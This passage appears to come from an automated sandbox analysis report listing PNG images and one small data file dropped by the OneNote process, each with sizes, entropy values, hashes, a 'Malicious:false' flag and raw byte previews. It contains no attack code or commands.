                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Matlab v4 mat-file (little endian) \300\001, numeric, rows 262223750, columns 0
                                                                                                        Category:dropped
                                                                                                        Size (bytes):72
                                                                                                        Entropy (8bit):2.560248976384695
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:ulX3/kj/aatM8xld3/Rtl:K3/apt5X
                                                                                                        MD5:18A49E014756C18E67AEA7C183A2DF60
                                                                                                        SHA1:353310EFC7EC63918A2C4164ACFCFD52E3572E9C
                                                                                                        SHA-256:2ABBCBECF865DB9BCCE4373A0DD7422482C7032D9E2D09F9640ABF6C4569892D
                                                                                                        SHA-512:C69608EDEF3703D0A2099F6D78BC9F262FFE2E41FBBDD7D4EAA473B2B0C23DABC19F8E3066E4CCA06EAAD184A0B9E0B0529CB7E77EFAE7D9C83E033ACBBF3175
                                                                                                        Malicious:false
                                                                                                        Preview:.....7..............................|........+.@.*.....@.(..............
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
